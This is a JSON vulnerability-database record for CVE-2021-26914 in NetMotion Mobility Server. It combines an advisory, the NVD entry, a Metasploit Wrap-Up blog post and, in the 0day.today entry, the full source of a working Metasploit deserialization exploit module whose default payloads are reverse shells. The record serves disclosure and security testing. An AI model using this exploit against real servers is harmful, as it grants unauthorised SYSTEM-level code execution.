{"srcincite": [{"lastseen": "2022-04-20T17:15:38", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of NetMotion Mobility Server. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the MvcUtil class. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nNetMotion\n\n**Affected Products:**\n\nNetMotion Mobility Server\n\n**Vendor Response:**\n\nNetMotion has issued an update to correct this vulnerability. More details can be found at: <https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020>\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-19T00:00:00", "type": "srcincite", "title": "SRC-2021-0007 : NetMotion Mobility Server MvcUtil valueStringToObject Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26914"], "modified": "2021-02-08T00:00:00", "id": "SRC-2021-0007", "href": "https://srcincite.io/advisories/src-2021-0007/", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": ""}], "cve": [{"lastseen": "2022-03-23T15:51:37", "description": "NetMotion Mobility before 11.73 and 12.x before 12.02 allows unauthenticated remote attackers to execute arbitrary code as SYSTEM because of Java deserialization in MvcUtil valueStringToObject.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-08T22:15:00", "type": "cve", "title": "CVE-2021-26914", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26914"], "modified": "2021-05-21T16:52:00", "cpe": [], "id": "CVE-2021-26914", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26914", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}], "zdt": [{"lastseen": "2021-12-22T15:16:12", "description": "This Metasploit module exploits an unauthenticated Java deserialization 
in the NetMotion Mobility server's MvcUtil.valueStringToObject() method, as invoked through the /mobility/Menu/isLoggedOn endpoint, to execute code as the SYSTEM account. Mobility server versions 11.x before 11.73 and 12.x before 12.02 are vulnerable. Tested against 12.01.09045 on Windows Server 2016.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "zdt", "title": "NetMotion Mobility Server MvcUtil Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26914"], "modified": "2021-05-18T00:00:00", "id": "1337DAY-ID-36263", "href": "https://0day.today/exploit/description/36263", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::JavaDeserialization\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n 
super(\n update_info(\n info,\n 'Name' => 'NetMotion Mobility Server MvcUtil Java Deserialization',\n 'Description' => %q{\n This module exploits an unauthenticated Java deserialization in the\n NetMotion Mobility server's MvcUtil.valueStringToObject() method, as\n invoked through the /mobility/Menu/isLoggedOn endpoint, to execute\n code as the SYSTEM account.\n\n Mobility server versions 11.x before 11.73 and 12.x before 12.02 are\n vulnerable. Tested against 12.01.09045 on Windows Server 2016.\n },\n 'Author' => [\n 'mr_me', # Discovery and PoC\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2021-26914'],\n ['URL', 'https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/'],\n ['URL', 'https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020'],\n ['URL', 'https://srcincite.io/advisories/src-2021-0007/']\n ],\n 'DisclosureDate' => '2021-02-08', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Command',\n {\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ],\n [\n 'PowerShell',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # C:\\Program Files\\NetMotion Server\\logs\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 
'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path)\n )\n\n unless (version = parse_version(res))\n return CheckCode::Unknown('Failed to parse version from response.')\n end\n\n unless vuln_version?(version)\n return CheckCode::Safe(\"NetMotion Mobility #{version} is patched.\")\n end\n\n CheckCode::Appears(\"NetMotion Mobility #{version} is unpatched.\")\n end\n\n def parse_version(res)\n return unless res&.code == 200\n\n # <img src='/images/menu_logo.png?version=12.01.09045' alt='Mobility' border='0' class='navLogo'>\n res.get_html_document.at('//img[@alt = \"Mobility\"]/@src').to_s[\n %r{^/images/menu_logo\\.png\\?version=(?<version>[\\d.]+)$},\n :version # Hat tip @adfoster-r7\n ]\n end\n\n def vuln_version?(version)\n @vuln_versions ||=\n (11.0...11.73).step(0.01) + # 11.0 through 11.72\n (12.0...12.02).step(0.01) # 12.0 through 12.01\n\n @vuln_versions.include?(version.to_f)\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n when :psh\n execute_command(\n cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n )\n )\n end\n end\n\n def execute_command(cmd, _opts = {})\n # XXX: %Path% is otherwise *only* C:\\Program Files\\NetMotion Server\n cmd.prepend(\n 'set Path=%Path%;' \\\n 'C:\\Windows\\System32' \\\n ';' \\\n 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0' \\\n '&&'\n )\n\n print_status('Triggering deserialization')\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mobility/Menu/isLoggedOn'),\n 'vars_post' => {\n 'Mvc_x_Form_x_Name' => go_go_gadget(cmd)\n }\n )\n\n unless res&.code == 200 && res.body == 'false' # If JSESSIONID is missing\n fail_with(Failure::PayloadFailed, 'Failed to trigger 
deserialization')\n end\n\n print_good('Successfully triggered deserialization')\n end\n\n def go_go_gadget(cmd)\n Rex::Text.encode_base64(\n Rex::Text.gzip(\n generate_java_deserialization_for_command(\n 'CommonsCollections6',\n 'cmd', # cmd.exe\n cmd\n )\n )\n )\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36263", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-05-21T19:40:01", "description": "## Dell DBUtil_2_3.sys IOCTL memmove privilege escalation\n\n\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) added a [new module](<https://github.com/rapid7/metasploit-framework/pull/15190>), which exploits insufficient access control in Dell's `dbutil_2_3.sys` firmware update driver included in the Dell Bios Utility that comes pre-installed with most Windows machines. The driver accepts Input/Output Control (IOCTL) requests without ACL requirements, allowing non-privileged users to perform memory read/write operations via the `memmove` function. This module exploits the arbitrary read/write vulnerability to perform local kernel-mode privilege escalation using the same token upgrade technique developed for the [Win32k ConsoleControl Offset Confusion](<https://github.com/rapid7/metasploit-framework/pull/14907>) exploit. The exploit needs to be run from within at least a Medium integrity process to be successful, and any invalid read/write addresses will result in an immediate blue screen. The module has been tested on Windows version `1803` through `20H2`.\n\n## Windows TokenMagic privilege escalation\n\nMetasploit contributor [jheysel-r7](<https://github.com/jheysel-r7>) added a new exploit module that leverages [TokenMagic](<https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1>) to elevate privileges and execute code as `SYSTEM`. 
This module can either be used to spawn a malicious service on a target system using the TokenMagic High IL, or it can be used to write a System32 DLL that is vulnerable to hijacking. The service method has been tested against Windows `7`, `8.1`, and `10` (`1511`, `1803`). The DLL method has been tested against Windows `10` (`1703`, `1803`).\n\n## New module content (4)\n\n * [NetMotion Mobility Server MvcUtil Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/15186>) by wvu and mr_me, which exploits [CVE-2021-26914](<https://attackerkb.com/topics/w0xSnwSjtG/cve-2021-26914?referrer=blog>) \\- This adds an exploit for CVE-2021-26914 which is a remotely exploitable vulnerability within NetMotion Mobility, whereby a crafted request can trigger a deserialization vulnerability resulting in code execution.\n * [Dell DBUtil_2_3.sys IOCTL memmove](<https://github.com/rapid7/metasploit-framework/pull/15190>) by Kasif Dekel, SentinelLabs, and Spencer McIntyre, which exploits [CVE-2021-21551](<https://attackerkb.com/topics/zAHZGAFaQX/cve-2021-21551?referrer=blog>) \\- This adds an exploit for CVE-2021-21551 which is an IOCTL that is provided by the DBUtil_2_3.sys driver distributed by Dell that can be abused to perform kernel-mode memory read and write operations.\n * [Windows Privilege Escalation via TokenMagic (UAC Bypass)](<https://github.com/rapid7/metasploit-framework/pull/15168>) by James Forshaw, Ruben Boonen (@FuzzySec), bwatters-r7, and jheysel-r7 - A new module has been added to exploit TokenMagic, an exploitation technique affecting Windows 7 to Windows 10 build 17134 inclusive, that allows users to elevate their privileges to `SYSTEM`. 
Affected systems can be exploited either by exploiting a DLL hijacking vulnerability affecting Windows 10 build 15063 up to build 17134 inclusive, or by creating a new service on the target system.\n * [SaltStack Salt Information Gatherer](<https://github.com/rapid7/metasploit-framework/pull/15113>) by c2Vlcgo and h00die - This PR adds a post module to gather Salt information, configs, etc.\n\n## Enhancements and features\n\n * [#15011](<https://github.com/rapid7/metasploit-framework/pull/15011>) from [acammack-r7](<https://github.com/acammack-r7>) \\- Enhances the analyze command to show additional information about whether an identified exploit is immediately runnable, or whether it requires additional credentials or options to be set before being run\n * [#15146](<https://github.com/rapid7/metasploit-framework/pull/15146>) from [smashery](<https://github.com/smashery>) \\- This makes two improvements to the exploit for [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit?referrer=blog>) (Baron Samedit). It removes the dependency on GCC being present in the target environment. 
It also adds new targets for Ubuntu 16.04, Ubuntu 14.04, CentOS 7, CentOS 8 and Fedora 23-27.\n * [#15178](<https://github.com/rapid7/metasploit-framework/pull/15178>) from [pingport80](<https://github.com/pingport80>) \\- The `auxiliary/client/telegram/send_message.rb` module has been updated to support sending documents, as well as sending documents and/or messages to multiple chat IDs.\n * [#15202](<https://github.com/rapid7/metasploit-framework/pull/15202>) from [h00die](<https://github.com/h00die>) \\- The list of WordPress plugins and themes has been updated to allow users to discover more plugins and themes when running tools such as `auxiliary/scanner/http/wordpress_scanner`.\n * [#15210](<https://github.com/rapid7/metasploit-framework/pull/15210>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The documentation for `exploit/multi/http/gitlab_file_read_rce` has been updated to provide additional information on how to set GitLab up with an SSL certificate for encrypted communications, allowing users to easily test scenarios in which an encrypted GitLab connection might be needed.\n * [#15212](<https://github.com/rapid7/metasploit-framework/pull/15212>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Metasploit modules implemented in Python now explicitly require python3 to be present on the system path. 
This ensures that python2 is no longer used unintentionally, which previously occurred on Kali systems.\n\n## Bugs fixed\n\n * [#15196](<https://github.com/rapid7/metasploit-framework/pull/15196>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- A bug has been fixed in the `msfdb` script that prevented users from being able to run the script if they installed Metasploit into a location that contained spaces within its path.\n * [#15205](<https://github.com/rapid7/metasploit-framework/pull/15205>) from [willy00](<https://github.com/willy00>) \\- A bug has been fixed in the `exploit/multi/http/gitlab_file_read_rce` module to allow it to target vulnerable GitLab servers where TLS is enabled.\n * [#15213](<https://github.com/rapid7/metasploit-framework/pull/15213>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- A fix has been applied to `msfdb` to use the passed-in SSL key path (if provided) instead of the default one at `~/.msf4/msf-ws-key.pem`, which may not exist if users have passed in an SSL key path as an option.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.44...6.0.45](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-05-12T18%3A09%3A40-05%3A00..2021-05-19T10%3A47%3A33-05%3A00%22>)\n * [Full diff 6.0.44...6.0.45](<https://github.com/rapid7/metasploit-framework/compare/6.0.44...6.0.45>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-05-21T19:11:44", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21551", "CVE-2021-26914", "CVE-2021-3156"], "modified": "2021-05-21T19:11:44", "id": "RAPID7BLOG:CBB459355DA52AAEA21DDFD10D5B6FDB", "href": "https://blog.rapid7.com/2021/05/21/metasploit-wrap-up-112/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}